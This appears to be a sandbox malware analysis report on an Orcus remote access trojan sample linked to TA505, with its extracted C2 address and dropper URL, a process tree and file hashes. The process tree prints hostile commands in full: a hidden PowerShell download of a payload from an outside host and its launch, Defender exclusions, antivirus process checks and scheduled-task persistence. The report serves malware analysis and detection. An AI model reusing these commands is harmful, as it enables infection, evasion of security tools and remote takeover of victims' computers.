Overview

overview

10

Static

static

3

6b8848b38b...e3.exe

windows7-x64

10

6b8848b38b...e3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    02-12-2024 16:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3.exe

  • Size

    6.9MB

  • MD5

    5eecc13df41c8e6967f8a3ecb1d0cda9

  • SHA1

    8ac9ce30344f976a09da51da509dee5d2b0e8723

  • SHA256

    6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3

  • SHA512

    24c981ad16a5bc65738127dc27f2c804f4678671a8c13ff60ef2edcf795b8b6d505d121f407514dfbe7853b5d7577299ae30832319d21e83c5c18f5c638382d1

  • SSDEEP

    196608:2ALE6dWjWnulUCK9vDfaa1RkYP60bs25rXSNBl66Wncma:k6fuiPrfZ1RBP60bs25rXQ66WnG

Score
10/10
orcusta505discoveryexecutionpersistenceratspywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn-downloads-now.xyz/COMSurrogate.exe

Extracted

Family

orcus

C2

45.74.38.211:4782

Mutex

7a9c0f279c464958aebbd585f20f1cf2

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

    ratspywarestealerorcus
  • Orcus family
    orcus
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

    ta505
  • Ta505 family
    ta505
  • Orcurs Rat Executable 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
    discovery
  • Drops file in Windows directory 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1144
      • C:\Users\Admin\AppData\Local\Temp\6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3.exe
        "C:\Users\Admin\AppData\Local\Temp\6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3.exe"
        2⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1232
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa opssvc"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1480
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2460
          • C:\Windows\SysWOW64\findstr.exe
            findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2348
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 491505
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2012
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2468
          • C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
            Dr.com B
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Deletes itself
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3000
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2984
            • C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
              C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1204
              • C:\Users\Admin\AppData\Local\Temp\COMSurrogate.exe
                "C:\Users\Admin\AppData\Local\Temp\COMSurrogate.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                PID:2948
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\ex.bat" "
                6⤵
                • System Location Discovery: System Language Discovery
                PID:316
                • C:\Windows\SysWOW64\net.exe
                  net session
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2564
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 session
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2476
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3052
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
                6⤵
                • System Location Discovery: System Language Discovery
                PID:696
                • C:\Windows\SysWOW64\net.exe
                  net session
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1308
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 session
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1548
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fi "imagename eq mi.exe"
                  7⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1836
                • C:\Windows\SysWOW64\find.exe
                  find /i "mi.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1952
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1368
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://cdn-downloads-now.xyz/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1480
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2560
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 15
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2960
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2972
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {5544E435-7D82-4782-80DE-A0C617B5C534} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
      1⤵
        PID:1056
        • C:\Windows\system32\wscript.EXE
          C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js"
          2⤵
            PID:2960
            • C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.scr
              "C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\Admin\AppData\Local\CreativePixel Tech\E"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2760

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js
          Filesize

          174B

          MD5

          f4e7fb4a2cd7331909b6376b42e531ab

          SHA1

          1459ff7146bb25b5ffa3921ed13b2a60b5c09718

          SHA256

          62e85e74af89f12a35f62448a1585c68b7599306dada8ca9dddde6018d7b12b3

          SHA512

          4616a3a014f1b1217c5c694b4d6785abea360dad8c622e8180b6531d8796e602eda0a0cd922dfa45b277604440778b847d18afb8baff7818e8d6ff3fb4dc8a28

          Download Submit

        • C:\Users\Admin\AppData\Local\CreativePixel Tech\E
          Filesize

          6.3MB

          MD5

          0a1e63fc10dd1dbb8b2db81e2388bf99

          SHA1

          67ad39aabbf4875bc1b165ccd5afc40194d1d3c8

          SHA256

          122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7

          SHA512

          94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Audit
          Filesize

          14KB

          MD5

          9da23439e34b0498b82ae193c5a8f3a8

          SHA1

          ae20bbe7fac03c94e42f4dd206d89003faae7899

          SHA256

          0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac

          SHA512

          cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\COMSurrogate.exe
          Filesize

          164KB

          MD5

          77334f046a50530cdc6e585e59165264

          SHA1

          657a584eafe86df36e719526d445b570e135d217

          SHA256

          eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08

          SHA512

          97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Cab8B9F.tmp
          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Commissioner
          Filesize

          872KB

          MD5

          6ee7ddebff0a2b78c7ac30f6e00d1d11

          SHA1

          f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2

          SHA256

          865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4

          SHA512

          57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat
          Filesize

          1KB

          MD5

          b98885d703994cb43b4520881ea093e0

          SHA1

          920e5c84f92e75e981cd1c0274888f3856441cf8

          SHA256

          1ab0379eced5141d70a438ff2312488f28f2c6e72c3948bb6b2b575207aab445

          SHA512

          cffe79b0d48746124138b68c51a16ae73d6c70da6d8afc49e973648d76c0cfdaf57c42da8df33b8e7530c73d547178a571ced933517685c1cbe326ad11ce82af

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\ex.bat
          Filesize

          401B

          MD5

          ce54310624724dc31ea4171ed501c1fa

          SHA1

          3c5b5c6d21eada75357a24699ba37703e6b2a3d0

          SHA256

          b955965b61fbec8f75499803f31ddce3228312df236d5e18c9b1b322dfc89f2e

          SHA512

          907ddf95e241da4104ab0e7535c74083f026b765d2e5717f817296828d652f2690215073b69552704b5ef6a075154b8f7f95384b8c3a79535b5109bdb3e2cf1c

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          e84a711ca2962f034dafcfc2b470a5ff

          SHA1

          353f2ee837ab6cf647fbad9b5692ed56c0e27eca

          SHA256

          f80c8f55178ea4f2ad907c287ca78efdadcae3fe7912861d2ce0df93931a247c

          SHA512

          8a09e4d22a129df377966c43f769b663ef955e0a59ec7809f6e5a1b598fb9566cde7f56ae043b538012a627978de8f68e2f520d01c6e2f78c14f55a81033fd85

          Download Submit

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          Download Submit

        • \Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
          Filesize

          63KB

          MD5

          b58b926c3574d28d5b7fdd2ca3ec30d5

          SHA1

          d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

          SHA256

          6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

          SHA512

          b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

          Download Submit

        • memory/1204-367-0x0000000000390000-0x0000000000794000-memory.dmp

          Filesize

          4.0MB

          Download

        • memory/1204-376-0x0000000000C20000-0x0000000000C38000-memory.dmp

          Filesize

          96KB

          Download

        • memory/1204-377-0x0000000000CF0000-0x0000000000D00000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1204-375-0x0000000000C10000-0x0000000000C18000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1204-374-0x0000000000BC0000-0x0000000000BC8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1204-373-0x00000000008D0000-0x00000000008D8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1204-372-0x0000000000890000-0x00000000008A2000-memory.dmp

          Filesize

          72KB

          Download

        • memory/1204-371-0x0000000001190000-0x00000000011EC000-memory.dmp

          Filesize

          368KB

          Download

        • memory/1204-370-0x00000000007B0000-0x00000000007BE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/1204-366-0x0000000000390000-0x0000000000794000-memory.dmp

          Filesize

          4.0MB

          Download

        • memory/1204-364-0x0000000000390000-0x0000000000794000-memory.dmp

          Filesize

          4.0MB

          Download

        • memory/2948-413-0x0000000000BD0000-0x0000000000BFE000-memory.dmp

          Filesize

          184KB

          Download